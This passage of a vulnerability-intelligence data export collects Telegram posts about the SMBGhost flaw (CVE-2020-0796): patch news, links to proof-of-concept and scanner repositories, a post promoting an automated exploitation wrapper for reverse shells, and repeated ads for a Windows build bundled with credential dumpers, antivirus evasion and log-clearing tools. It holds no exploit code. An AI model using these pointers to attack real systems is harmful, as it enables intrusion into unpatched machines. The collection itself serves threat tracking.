\u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u044b\u043c, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435 \u0435\u0433\u043e \u043f\u043e \u0441\u0432\u043e\u0435\u043c\u0443 \u0443\u0441\u043c\u043e\u0442\u0440\u0435\u043d\u0438\u044e. \u0418\u043d\u043e\u0433\u0434\u0430 \u043e\u043d \u043d\u0435 \u0441\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0441 \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u0434\u043e\u0431\u0430\u0432\u0438\u043b \u0432\u0442\u043e\u0440\u0443\u044e \u043f\u043e\u043f\u044b\u0442\u043a\u0443.\n\n#tools", "creation_timestamp": "2023-03-01T11:00:42.000000Z"}, {"uuid": "ea8922f6-8732-454b-9a52-a77046c2aaec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/poxek/325", "content": "SMBGhost (CVE-2020-0796) Automate Exploitation and Detection\n\u042d\u0442\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u043d\u0430 python \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u043e\u0431\u0435\u0440\u0442\u043a\u0443 \u043e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 RCE SMBGhost. \u0412\u0441\u0435 \u0437\u0430\u0441\u043b\u0443\u0433\u0438 \u0437\u0430 \u0440\u0430\u0431\u043e\u0447\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 - chompie1337. \u0412\u0441\u0435 \u0437\u0430\u0441\u043b\u0443\u0433\u0438 \u0437\u0430 \u0441\u043a\u0430\u043d\u0435\u0440 - ioncodes.\n\u042f \u043f\u0440\u043e\u0441\u0442\u043e \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b \u044d\u0442\u0438 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0432 \u043e\u0434\u043d\u043e\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435. \u0412\u044b \u0434\u043e\u043b\u0436\u043d\u044b \u0443\u0447\u0438\u0442\u044b\u0432\u0430\u0442\u044c \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u0443 Windows-\u0446\u0435\u043b\u0438, \u043a\u043e\u0433\u0434\u0430 \u0441\u043e\u0431\u0438\u0440\u0430\u0435\u0442\u0435\u0441\u044c \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043e\u0431\u0440\u0430\u0442\u043d\u0443\u044e \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0443.\n\u042d\u0442\u043e\u0442 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043d\u0435 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u044b\u043c, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435 \u0435\u0433\u043e \u043f\u043e \u0441\u0432\u043e\u0435\u043c\u0443 \u0443\u0441\u043c\u043e\u0442\u0440\u0435\u043d\u0438\u044e. \u0418\u043d\u043e\u0433\u0434\u0430 \u043e\u043d \u043d\u0435 \u0441\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0441 \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u0434\u043e\u0431\u0430\u0432\u0438\u043b \u0432\u0442\u043e\u0440\u0443\u044e \u043f\u043e\u043f\u044b\u0442\u043a\u0443.\n\nhttps://github.com/Barriuso/SMBGhost_AutomateExploitation\n\n@dnevnik_infosec", "creation_timestamp": "2021-12-24T06:37:20.000000Z"}, {"uuid": "82e32970-4610-4c22-81d1-024b6065524e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/alexmakus/3347", "content": "\u0435\u0449\u0435 \u043e\u0434\u0438\u043d \u043c\u0430\u0440\u0442\u043e\u0432\u0441\u043a\u0438\u0439 \u043f\u0430\u0442\u0447 Microsoft \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0434\u0435\u0442\u0430\u043b\u0438 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0443\u0442\u0435\u043a\u043b\u0438 \u043f\u0430\u0440\u0443 \u0434\u043d\u0435\u0439 \u043d\u0430\u0437\u0430\u0434 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 March Patch Tuesday. \u0410\u043f\u0434\u0435\u0439\u0442\u044b \u0434\u043b\u044f Windows 10 \u0438 Windows Server 2019. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0435 SMBv3 - \u0432 Server Message Block, \u0435\u0441\u043b\u0438 \u0431\u044b\u0442\u044c \u0442\u043e\u0447\u043d\u044b\u043c. \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0442\u044c\u0441\u044f \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u043a\u043b\u044e\u0447\u0435\u043d \u0441\u0435\u0440\u0432\u0438\u0441 SMB, \u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 SYSTEM. \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u043e\u0432\u0430\u043d\u043e \u043a \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435.  \n\nKB https://portal.msrc.microsoft.com/en-us/security-guidance\nCVE https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796", "creation_timestamp": "2020-03-12T16:21:19.000000Z"}, {"uuid": "68facc93-8e77-44d2-98dd-b916a95c3b6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/ctinow/21285", "content": "Kryptos Logic Researchers discovered roughly 48,000 Windows 10 hosts vulnerable to attacks targeting CVE-2020-0796.\n\nhttps://t.co/CbaH4GEsRt http://twitter.com/BleepinComputer/status/1238129339218235393", "creation_timestamp": "2020-03-12T16:50:37.000000Z"}, {"uuid": "44d37375-5b4c-4b9d-8ee0-ed4597f4efca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/avdno/701", "content": "\u041d\u0435 \u0432\u0435\u0440\u044c\u0442\u0435 \u0432\u0441\u0435\u043c\u0443, \u043e \u0447\u0435\u043c \u043f\u0438\u0448\u0435\u0442 \u0442\u0432\u0438\u0442\u0442\u0435\u0440 \u041b\u041a, \u0441\u0435\u0439\u0447\u0430\u0441 \u043e\u043d \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0435\u0442, \u0447\u0442\u043e \u043f\u0430\u0442\u0447\u0430 \u043a CVE-2020-0796 \u043d\u0435\u0442, \u0445\u043e\u0442\u044f \u043f\u0430\u0442\u0447 \u0432\u044b\u0448\u0435\u043b \u0435\u0449\u0451 \u0432\u0447\u0435\u0440\u0430 \n\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796", "creation_timestamp": "2020-03-14T11:46:18.000000Z"}, {"uuid": "9f1d3cbd-313e-41d3-9327-f0dfbbba72ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/hybgl/117", "content": "https://github.com/danigargu/CVE-2020-0796", "creation_timestamp": "2020-03-30T20:32:45.000000Z"}, {"uuid": "bcd38cf4-aed2-447d-aeb4-e76b857a40b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/hybgl/169", "content": "#Windows\n#smb3\n#CVE\n#CVE-2020-0796\n#scanner\n\nhttps://github.com/ollypwn/SMBGhost", "creation_timestamp": "2020-04-20T15:31:32.000000Z"}, {"uuid": "8556c0e8-6900-4b56-b5b2-3829ff124740", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/ctinow/21283", "content": "BREAKING: Microsoft releases the out-of-band KB4551762 Windows 10 security update to patch the CVE-2020-0796 SMBv3 RCE vulnerability\nhttps://t.co/M1A1RKezX4 http://twitter.com/BleepinComputer/status/1238128405910097921", "creation_timestamp": "2020-03-12T16:50:35.000000Z"}, {"uuid": "739fb733-7f11-4841-9e9d-cb3245c11a56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/Ninjutsu_os/134", "content": "\ud83d\udd30Ninjutsu OS Info \ud83d\udd30  \n\n\nWe added 40 Nmap Scripting Engine (NSE) to Ninjutsu OS\n\nAxis_vuln_webcam\ncisco-asa-scan\nhttp-middleware-path-finder\nCVE-2018-13379\ncisco-cve-2019-1937\nhttp-pulse_ssl_vpn\nCVE-2018-20377\ncitrix\nhttp-screenshot\nphpadmin\nCVE-2018-4407\nclickjacking-prevent-check\nhttp-shellshock\nsmb-vuln-cve-2020-0796\nCVE-2018-7600_drupalgeddon\ncve_2019_1653\nhttp-vuln-CVE-2019-16759\ntomcat-cve-2017-12615\nCVE-2019-19781\ndlink-cve-2019-13101\nhttp-vuln-cve2017-18195\ntraversal\nCVE-2020-0796\ndocker_daemontcp\nhttp-waf-test\nvxworks_urgent11\nIIS-CVE-2010-2731\nfile-checker\nhttpcs_docker-daemontcp-prod\nweblogic-CNVD-C-2019-48814\nMS15-034\nfreevu\narch\nhydra\nweblogic-cve-2018-2894\nabb-cve-2019-7226\nhttp-lfi\ninfiltrator\nwinVulnDetection", "creation_timestamp": "2020-05-12T13:27:31.000000Z"}, {"uuid": "f6b37656-2a21-4da6-a814-f586bf9833c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/ctinow/21359", "content": "RT @serghei: Proof-of-concept local privilege escalation exploit for CVE-2020-0796 from @SophosLabs https://t.co/ummaRLrTy1 http://twitter.com/BleepinComputer/status/1238894151317536768", "creation_timestamp": "2020-03-14T19:37:25.000000Z"}, {"uuid": "4628b2d7-2088-4fd1-b806-f17f4a1656b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/Ninjutsu_os/343", "content": "WINDOWS 10 PRO 2004 [19041] X64\nVersion: 2004\nBuild: 19041.450\nEdition: Pro\nArch: x64\nLang: en-US\n\n---------------------------------------------------------\nChangelog / Updates:\n\n\u2705 26/08/2020\n\nFeatures:\n\u2705 Windows 10 Pre-Installed Penetration Testing, Red Teaming.\n\u2705 More than 800 penetration testing tools.\n\u2705 Customize Windows 10 with powerful tweak and optimize to Protect your privacy.\n\u2705 Unwanted Windows components removal.\n\u2705 Disable many of the annoying features built into windows.\n\u2705 Remove/Disable many Windows programs and services.\n\u2705 Prefills the commandline.\n\u2705 Windows Terminal Powerline in PowerShell  \n\u2705 .NET Framework (4.0/4.5/4.6/4.7/4.8/2.x/3.x)\n\u2705 Optimized WINDOWS\n\u2705 Performs privacy & security check of Windows 10\n\n\n\nRemove/Disables component:\n\u2705 Greenshot Apps\n\u2705 Vega Web Scanner\n\u2705 yogadns\n\u2705 Microsoft Edge Browser\n\u2705 Docker\n\u2705 Nox Android Emulator\n\u2705 COMODO Firewall\n\u2705 Winja\n\u2705 MarkdownEdit\n\u2705 Windows Apps and System Apps\n\u2705 Windows Security / Defender  / Smartscreen\n\u2705 OneDrive\n\u2705 Disable UAC (Never notify)\n\u2705 Internet Explorer 11\n\u2705 Media Features\n\u2705 Windows powershell v2\n\n\n### Updated Tools :\n\n# Antivirus Evasion Tools\n\u2705 Macro Pack-Automatize Obfuscation & Generation of MS Office\n\n# Exploitation Tools\n\u2705 Goby Attack surface mapping\n\u2705 Metasploit\n\n# Information Gathering\n\u2705 subfinder\n\u2705 Sublist3r\n\u2705 FinalRecon\n\u2705 findomain\n\u2705 amass\n\u2705 gitleaks\n\u2705 EyeWitness\n\u2705 Maltego\n\n# Malware Analysis\n\u2705 Detect It Easy\n\u2705 dnSpy\n\u2705 loki\n\u2705 Process Explorer\n\n# Mobile Security Tools\n\u2705 Mobile-Security-Framework-MobSF\n\n# Proxy and Privacy Tools\n\u2705 Tor Browser\n\u2705 SimpleDNSCrypt\n\u2705 WPD\n\u2705 O&O ShutUp10\n\u2705 W10Privacy\n\n# Reverse Engineering\n\u2705 x64dbg\n\u2705 dnSpy\n\n# Web Application Attack\n\u2705 WPScan-WordPress Vulnerability Scanner\n\u2705 BuprSuite \n\u2705 testssl.sh\n\u2705 commix\n\u2705 droopescan\n\u2705 sqlmap\n\u2705 nuclei\n\u2705 sslscan\n\u2705 gowitness\n\n# Wireless Attacks\n\u2705 bettercap\n\n# Utility Tools\n\u2705 chrome\n\u2705 Firefox\n\u2705 Brave\n\u2705 Sharex\n\n\n## Added Tools :\n\n# Command & Control\n\u2705 LocalXpose\n\u2705 One-Lin3r\n\u2705 UPnP PortMapper\n\n# Exploitation Tools\n\u2705 HiveJack  dump Windows credentials\n\n# Information Gathering\n\u2705 IP List Generator 2 (x64)\n\n# Malware Analysis\n\u2705 AnVir Task Manager\n\u2705 Dependency Walker\n\u2705 HijackThis\n\u2705 YARA\n\n# Mobile Security Tools\n\n# Networking Attack\n\u2705 superscan\n\u2705 sipp\n\u2705 sippts\n\u2705 SIPP -VOIP Test\n\u2705 SIPVicious suite\n\u2705 sipscan\n\u2705 nbrute\n\u2705 winbox\n\u2705 SNMPCheck SNMP enumerator\n\u2705 SIP Scanner\n\u2705 OWASP-Nettacker\n\n# Password Attacks\n\u2705 ncrack\n\n# Proxy and Privacy Tools\n\u2705 privatezilla\n\u2705 Clear All Event Logs\n\u2705 BleachBit\n\u2705 TMAC (MAC Address Changer)\n\u2705 SoftEther VPN Client Manager (Free VPN)\n\u2705 tor bundle (terminal #tor)\n\n# Reverse Engineering\n\u2705 Cutter\n\n# Vulnerability Analysis\n\n# Web Application Attack\n\u2705 WS-Attacker-1.8\n\u2705 wsdigger\n\u2705 weblogicScanner\n\u2705 CMSMap CMS vulnerability scanner\n\u2705 All-in-One OS command injection\n\u2705 WSDigger -Web Services\n\n\n# Wireless Attacks\n\u2705 CommViewforWiFi\n\n# Wordlists\n\u2705 Cheatsheet-God\n\u2705 penetration-testing-cheat-sheet\n\u2705 PentesterSpecialDict\n\n# Utility Tools\n\u2705 TCPOptimizer\n\u2705 Markdown Monster\n\u2705 ccenhancer\n\u2705 Driver Easy\n\u2705 IrfanView\n\u2705 TreeSizeFree\n\n\n# Nmpa NSE :\n\n\u2705 CVE-2020-0796_new\n\u2705 smb2-capabilities_patched\n\u2705 cve-2020-1350\n\u2705 cve-2020-0796\n\u2705 http-vuln-cve2020-3452\n\u2705 http-vuln-cve2020-5902\n\u2705 http-raw-headers\n\u2705 http-vuln-cve2017-18195\n\u2705 dlink-cve-2019-13101\n\u2705 cisco-cve-2019-1937\n\u2705 abb-cve-2019-7226\n\u2705 cve_2019_1653\n\u2705 CVE-2019-19781\n\u2705 http-vuln-CVE-2019-16759\n\u2705 weblogic-CNVD-C-2019-48814\n\u2705 smb-vuln-cve-2020-0796\n\n\n### Privacy Tweaks ###\n\u2705 Block pop-ups and annoying ads on websites (Hosts)\n\u2705 Disable Inventory  Collector\n\u2705 Disable Get Even more out of windows\n\u2705 Disable app access to notificaton , account info ,email ..etc \n\u2705 Disable Telemetry\n\u2705 Disable WiFi Sense\n\u2705 Disable SmartScreen\n\u2705 Disable WebSearch\n\u2705 Disable App Suggestions\n\u2705 Disable Activity History\n\u2705 Disable Background Apps\n\u2705 Disable Sensors\n\u2705 Disable Location\n\u2705 Disable MapUpdates\n\u2705 Disable Feedback\n\u2705 Disable Tailored Experiences\n\u2705 Disable Advertising ID\n\u2705 Disable WebLangList\n\u2705 Disable Cortana\n\u2705 Disable Error Reporting\n\u2705 Disable SetP2P", "creation_timestamp": "2020-08-27T17:04:45.000000Z"}, {"uuid": "4befcc54-a17d-470c-8ac9-647b70894892", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/ctinow/21292", "content": "Security Patch Released for 'Wormable' SMBv3 Vulnerability \u2014 Install It ASAP! Microsoft today finally released software updates to patch a recently disclosed very dangerous vulnerability in SMBv3 protocol that could let attackers launch wormable malware, which propagates itself from one vulnerable computer to another automatically.\n\nThe vulnerability, tracked as CVE-2020-0796, in question is a remote code execution flaw that affects Windows 10 version 1903 and 1909, and", "creation_timestamp": "2020-03-12T18:09:18.000000Z"}, {"uuid": "181e9a23-ad8f-4dd9-adae-c17af65e9744", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/ctinow/21212", "content": "https://t.co/RXWs9dcvdE\nCVE-2020-0796 #CoronaBlue https://t.co/RXWs9dcvdE\n\n*cyb3rops*", "creation_timestamp": "2020-03-11T09:46:14.000000Z"}, {"uuid": "1d70f339-f90b-424f-a2f2-2204de04a22c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/ctinow/21179", "content": "Microsoft Leaks Info on Wormable Windows SMBv3 CVE-2020-0796 Flaw - by @serghei\nhttps://t.co/NpFNUgQd34 http://twitter.com/BleepinComputer/status/1237487933113974790", "creation_timestamp": "2020-03-10T22:20:17.000000Z"}, {"uuid": "1d0fb37c-6ca9-49f3-8cdd-b9bdb67aefc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/Ninjutsu_os/6563", "content": "WINDOWS 10 PRO 2004 [19041] X64\nVersion: 2004\nBuild: 19041.450\nEdition: Pro\nArch: x64\nLang: en-US\n\n---------------------------------------------------------\nChangelog / Updates:\n\n\u2705 26/08/2020\n\nFeatures:\n\u2705 Windows 10 Pre-Installed Penetration Testing, Red Teaming.\n\u2705 More than 800 penetration testing tools.\n\u2705 Customize Windows 10 with powerful tweak and optimize to Protect your privacy.\n\u2705 Unwanted Windows components removal.\n\u2705 Disable many of the annoying features built into windows.\n\u2705 Remove/Disable many Windows programs and services.\n\u2705 Prefills the commandline.\n\u2705 Windows Terminal Powerline in PowerShell  \n\u2705 .NET Framework (4.0/4.5/4.6/4.7/4.8/2.x/3.x)\n\u2705 Optimized WINDOWS\n\u2705 Performs privacy & security check of Windows 10\n\n\n\nRemove/Disables component:\n\u2705 Greenshot Apps\n\u2705 Vega Web Scanner\n\u2705 yogadns\n\u2705 Microsoft Edge Browser\n\u2705 Docker\n\u2705 Nox Android Emulator\n\u2705 COMODO Firewall\n\u2705 Winja\n\u2705 MarkdownEdit\n\u2705 Windows Apps and System Apps\n\u2705 Windows Security / Defender  / Smartscreen\n\u2705 OneDrive\n\u2705 Disable UAC (Never notify)\n\u2705 Internet Explorer 11\n\u2705 Media Features\n\u2705 Windows powershell v2\n\n\n### Updated Tools :\n\n# Antivirus Evasion Tools\n\u2705 Macro Pack-Automatize Obfuscation & Generation of MS Office\n\n# Exploitation Tools\n\u2705 Goby Attack surface mapping\n\u2705 Metasploit\n\n# Information Gathering\n\u2705 subfinder\n\u2705 Sublist3r\n\u2705 FinalRecon\n\u2705 findomain\n\u2705 amass\n\u2705 gitleaks\n\u2705 EyeWitness\n\u2705 Maltego\n\n# Malware Analysis\n\u2705 Detect It Easy\n\u2705 dnSpy\n\u2705 loki\n\u2705 Process Explorer\n\n# Mobile Security Tools\n\u2705 Mobile-Security-Framework-MobSF\n\n# Proxy and Privacy Tools\n\u2705 Tor Browser\n\u2705 SimpleDNSCrypt\n\u2705 WPD\n\u2705 O&O ShutUp10\n\u2705 W10Privacy\n\n# Reverse Engineering\n\u2705 x64dbg\n\u2705 dnSpy\n\n# Web Application Attack\n\u2705 WPScan-WordPress Vulnerability Scanner\n\u2705 BuprSuite \n\u2705 testssl.sh\n\u2705 commix\n\u2705 droopescan\n\u2705 sqlmap\n\u2705 nuclei\n\u2705 sslscan\n\u2705 gowitness\n\n# Wireless Attacks\n\u2705 bettercap\n\n# Utility Tools\n\u2705 chrome\n\u2705 Firefox\n\u2705 Brave\n\u2705 Sharex\n\n\n## Added Tools :\n\n# Command & Control\n\u2705 LocalXpose\n\u2705 One-Lin3r\n\u2705 UPnP PortMapper\n\n# Exploitation Tools\n\u2705 HiveJack  dump Windows credentials\n\n# Information Gathering\n\u2705 IP List Generator 2 (x64)\n\n# Malware Analysis\n\u2705 AnVir Task Manager\n\u2705 Dependency Walker\n\u2705 HijackThis\n\u2705 YARA\n\n# Mobile Security Tools\n\n# Networking Attack\n\u2705 superscan\n\u2705 sipp\n\u2705 sippts\n\u2705 SIPP -VOIP Test\n\u2705 SIPVicious suite\n\u2705 sipscan\n\u2705 nbrute\n\u2705 winbox\n\u2705 SNMPCheck SNMP enumerator\n\u2705 SIP Scanner\n\u2705 OWASP-Nettacker\n\n# Password Attacks\n\u2705 ncrack\n\n# Proxy and Privacy Tools\n\u2705 privatezilla\n\u2705 Clear All Event Logs\n\u2705 BleachBit\n\u2705 TMAC (MAC Address Changer)\n\u2705 SoftEther VPN Client Manager (Free VPN)\n\u2705 tor bundle (terminal #tor)\n\n# Reverse Engineering\n\u2705 Cutter\n\n# Vulnerability Analysis\n\n# Web Application Attack\n\u2705 WS-Attacker-1.8\n\u2705 wsdigger\n\u2705 weblogicScanner\n\u2705 CMSMap CMS vulnerability scanner\n\u2705 All-in-One OS command injection\n\u2705 WSDigger -Web Services\n\n\n# Wireless Attacks\n\u2705 CommViewforWiFi\n\n# Wordlists\n\u2705 Cheatsheet-God\n\u2705 penetration-testing-cheat-sheet\n\u2705 PentesterSpecialDict\n\n# Utility Tools\n\u2705 TCPOptimizer\n\u2705 Markdown Monster\n\u2705 ccenhancer\n\u2705 Driver Easy\n\u2705 IrfanView\n\u2705 TreeSizeFree\n\n\n# Nmpa NSE :\n\n\u2705 CVE-2020-0796_new\n\u2705 smb2-capabilities_patched\n\u2705 cve-2020-1350\n\u2705 cve-2020-0796\n\u2705 http-vuln-cve2020-3452\n\u2705 http-vuln-cve2020-5902\n\u2705 http-raw-headers\n\u2705 http-vuln-cve2017-18195\n\u2705 dlink-cve-2019-13101\n\u2705 cisco-cve-2019-1937\n\u2705 abb-cve-2019-7226\n\u2705 cve_2019_1653\n\u2705 CVE-2019-19781\n\u2705 http-vuln-CVE-2019-16759\n\u2705 weblogic-CNVD-C-2019-48814\n\u2705 smb-vuln-cve-2020-0796\n\n\n### Privacy Tweaks ###\n\u2705 Block pop-ups and annoying ads on websites (Hosts)\n\u2705 Disable Inventory  Collector\n\u2705 Disable Get Even more out of windows\n\u2705 Disable app access to notificaton , account info ,email ..etc \n\u2705 Disable Telemetry\n\u2705 Disable WiFi Sense\n\u2705 Disable SmartScreen\n\u2705 Disable WebSearch\n\u2705 Disable App Suggestions\n\u2705 Disable Activity History\n\u2705 Disable Background Apps\n\u2705 Disable Sensors\n\u2705 Disable Location\n\u2705 Disable MapUpdates\n\u2705 Disable Feedback\n\u2705 Disable Tailored Experiences\n\u2705 Disable Advertising ID\n\u2705 Disable WebLangList\n\u2705 Disable Cortana\n\u2705 Disable Error Reporting\n\u2705 Disable SetP2P", "creation_timestamp": "2020-08-27T17:04:45.000000Z"}, {"uuid": "cb6dc184-dc82-40b1-9967-cfe8024ba917", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/Ninjutsu_os/739", "content": "\ud83d\udd30Ninjutsu OS Info \ud83d\udd30  \n\n\nWe added 40 Nmap Scripting Engine (NSE) to Ninjutsu OS\n\nAxis_vuln_webcam\ncisco-asa-scan\nhttp-middleware-path-finder\nCVE-2018-13379\ncisco-cve-2019-1937\nhttp-pulse_ssl_vpn\nCVE-2018-20377\ncitrix\nhttp-screenshot\nphpadmin\nCVE-2018-4407\nclickjacking-prevent-check\nhttp-shellshock\nsmb-vuln-cve-2020-0796\nCVE-2018-7600_drupalgeddon\ncve_2019_1653\nhttp-vuln-CVE-2019-16759\ntomcat-cve-2017-12615\nCVE-2019-19781\ndlink-cve-2019-13101\nhttp-vuln-cve2017-18195\ntraversal\nCVE-2020-0796\ndocker_daemontcp\nhttp-waf-test\nvxworks_urgent11\nIIS-CVE-2010-2731\nfile-checker\nhttpcs_docker-daemontcp-prod\nweblogic-CNVD-C-2019-48814\nMS15-034\nfreevu\narch\nhydra\nweblogic-cve-2018-2894\nabb-cve-2019-7226\nhttp-lfi\ninfiltrator\nwinVulnDetection", "creation_timestamp": "2020-05-12T13:27:34.000000Z"}, {"uuid": "19d1de43-b514-4931-83da-50844a428f89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/pt_soft/270", "content": "\ud83d\uddbc\ufe0f \ud83d\udd04 Moriarty v1.2\n\n\u0427\u0435\u043a\u0435\u0440 CVEs \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 C# \u0434\u043b\u044f \u041e\u0421 \ud83c\udfe0 Windows\n\n\u041f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438:\nWindows 10 (Versions: 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004, 20H2, 21H1, 21H2, 22H1, 22H2)\nWindows 11 (Versions: 21H2, 22H1, 22H2, 23H1)\nWindows Server 2016, 2019, 2022\n\n\u0421\u043f\u0438\u0441\u043e\u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 (35):\nMS10-015\nMS10-092\nMS13-053\nMS13-081\nMS14-058\nMS15-051\nMS15-078\nMS16-016\nMS16-032\nMS16-034\nMS16-135\nCVE-2017-7199\nCVE-2019-0836\nCVE-2019-0836\nCVE-2019-1064\nCVE-2019-1130\nCVE-2019-1253\nCVE-2019-1315\nCVE-2019-1385\nCVE-2019-1388\nCVE-2019-1405\nCVE-2020-0668\nCVE-2020-0683\nCVE-2020-0796\nCVE-2020-1013\nCVE-2020-1013\nCVE-2021-26855\nCVE-2021-26857\nCVE-2021-26858\nCVE-2021-27065\nCVE-2021-44228\nCVE-2021-36934\nCVE-2022-40140\nCVE-2022-22965\nCVE-2023-36664\n\n1.2 added:\n2023-23397\n2022-34718\n\n\ud83d\udc49 \u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439\n\n\u0422\u0430\u043a\u0436\u0435 \u0431\u043e\u0442 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u0438\u0441\u043a \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u0432 \u043f\u043e CVE\n\n!poc CVE-2019-1064\n\n\ud83d\udcbb Home\n\n\u0414\u043b\u044f \u0441\u0431\u043e\u0440\u043a\u0438 